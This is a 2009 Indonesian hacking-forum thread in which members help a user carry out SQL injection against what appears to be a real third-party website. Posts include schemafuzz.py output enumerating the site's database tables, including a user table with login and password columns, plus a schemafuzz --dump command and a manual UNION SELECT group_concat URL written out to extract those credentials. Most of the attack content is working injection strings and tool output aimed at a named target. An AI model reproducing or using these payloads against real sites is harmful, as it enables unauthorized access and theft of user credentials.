schemafuzz.py

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
pataka
Posts: 20
Joined: Sun Aug 02, 2009 5:50 pm

schemafuzz.py

Post by pataka » Sun Aug 09, 2009 2:39 pm

:D :D :D mas mo nanya ne...kasih tutor dong tentang schemafuzz....kok kagak isa ya ngbuka isi tabel column...abis coba hasilnya kya gini..

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL:http://www.sensor.com/eng/news_detail.p ... ,5,6,7,8--
[+] Evasion Used: "+" "--"
[+] 03:23:20
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: trueidc
User: trueidc@localhost
Version: 5.0.22
[+] Showing all databases current user has access too!
[+] Number of Databases: 1

[0]trueidc

[-] [03:23:37]
[-] Total URL Requests 3
[-] Done

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL:http://www.sensor.com/eng/news_detail.p ... ,5,6,7,8--
[+] Evasion Used: "+" "--"
[+] 03:27:52
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: trueidc
User: trueidc@localhost
Version: 5.0.22
[+] Showing Tables & Columns from database "trueidc"
[+] Number of Tables: 9

[Database]: trueidc
[Table: Columns]
[0]tbco_location: ID,sDetailT,sDetailE,sFilename_top,sFilename_left
[1]tbdedicate: ID,sTopDetailT,sTopDetailE,sMidDetailT,sMidDetailE,sFilename
[2]tbfaq: ID,sQuestionT,sAnswerT,sQuestionE,sAnswerE,bEnableT,bEnableE,sPostName,sPostEmail,sType
[3]tblink: ID,sType,sSubjectT,sSubjectE,sLink,bEnableT,bEnableE,sFilename
[4]tbnewspro: ID,dDate,sTopicT,sDetailT,sTopicE,sDetailE,sFilename,bEnableT,bEnableE
[5]tbproduct_service_home: ID,dDate,sTopicT,sTopicE,bEnableT,bEnableE,sLink
[6]tbserver_spec: ID,sNameT,sDetailT,sNameE,sDetailE,sFilename,bEnableT,bEnableE
[7]tbuser: ID,sName,sLogin,sPassword,bAdmin
[8]tbwebbase: ID,iOrder,sContentT,sContentE,sFilename

[-] [03:30:57]
[-] Total URL Requests 65
[-] Done

User avatar
shad.hckr
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr
Contact:

Re: schemafuzz.py

Post by shad.hckr » Sun Aug 09, 2009 9:17 pm

kalo ga bisa pake manual aja.. kan dah keliatan tuh table ma column..

pataka
Posts: 20
Joined: Sun Aug 02, 2009 5:50 pm

Re: schemafuzz.py

Post by pataka » Mon Aug 10, 2009 2:44 pm

caranya gmn...kasih tutorial dong mas...thanks...

defacement88
Posts: 17
Joined: Tue Jul 21, 2009 11:54 am

Re: schemafuzz.py

Post by defacement88 » Wed Aug 12, 2009 2:02 pm

Code: Select all

./schemafuzz.py --dump -u http://www.sensor.com/eng/news_detail.php?id=1+AND+1=2+UNION+SELECT+0,1,2,3,darkc0de,5,6,7,8-- -D trueidc -T tbuser -C ID,sName,sLogin,sPassword,bAdmin
Image

User avatar
lfay
Posts: 9
Joined: Fri Feb 15, 2008 10:32 am
Location: dimana pun aku ada..

Re: schemafuzz.py

Post by lfay » Sat Aug 15, 2009 1:31 pm

manual aja dlu ..

gak usah pake tools..
mungkin cepet paham kawan.... :D
Saya tidak pinter, tidak jenius, apalagi disebut2 hebat..
/me hanya seorang yang pengen belajar memahami sesuatu yang sulit untuk dipecahkan..

User avatar
shad.hckr
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr
Contact:

Re: schemafuzz.py

Post by shad.hckr » Sat Aug 15, 2009 3:33 pm

bener tuh kata om lfay.. pahami dasarnya dulu biar tau cara kerjanya.. kan lumayan buat tambah2 ilmu daripada make tools tp kita ga tau apa2.. hehehe.. peace..

User avatar
aries deris
Posts: 65
Joined: Sat Nov 17, 2007 10:12 pm
Location: neverland

Re: schemafuzz.py

Post by aries deris » Sat Aug 15, 2009 6:47 pm

Code: Select all

[7]tbuser: ID,sName,sLogin,sPassword,bAdmin
tuh kan table nya udah tau
lok manualan carane pernah di posting kok
coba searh aja
tar jadinya kek gini

Code: Select all

http://www.sensor.com/eng/news_detail.php?id=1+AND+1=2+UNION+SELECT+0,1,2,3,group_concat(ID,0x3a,sName,0x3a,sLogin,0x3a,sPassword,0x3a,bAdmin),5,6,7,8 from tbuser--
dimana 0x3a mempnyai nilai = ":"

begitu kira2 :D
maaf lok gag paham :D
hehehe
What you believe to be true is false
what you thing to be done is wrong
believe me the battle will never end

pataka
Posts: 20
Joined: Sun Aug 02, 2009 5:50 pm

Re: schemafuzz.py

Post by pataka » Sat Aug 15, 2009 8:56 pm

wah...sip2 mas...q coba pelajarin dulu ya...makasih atas tutornya...majoe trs dah bwt YF

User avatar
vodork
Posts: 191
Joined: Wed Jun 10, 2009 1:52 am
Location: jogja/sarkem
Contact:

Re: schemafuzz.py

Post by vodork » Sat Aug 15, 2009 11:08 pm

kalo aku sih libih mantap kalo manual 8) 8)
olah raga otak kalo gak bisa ketemu2 bisa langsung pukul pake palu keyboardnya :lol: :lol:
peace :D :D
.::[tresno jalaran saking kulino]::.

.::[nek wes kullino]::.

.::[karepmu]::.

pataka
Posts: 20
Joined: Sun Aug 02, 2009 5:50 pm

Re: schemafuzz.py

Post by pataka » Sat Aug 15, 2009 11:46 pm

percuma mas kgak mempan soalnya keyboard q terbuat dari baja murni...hahaha :lol: :lol: :lol:

Post Reply

Return to “Web Hacking”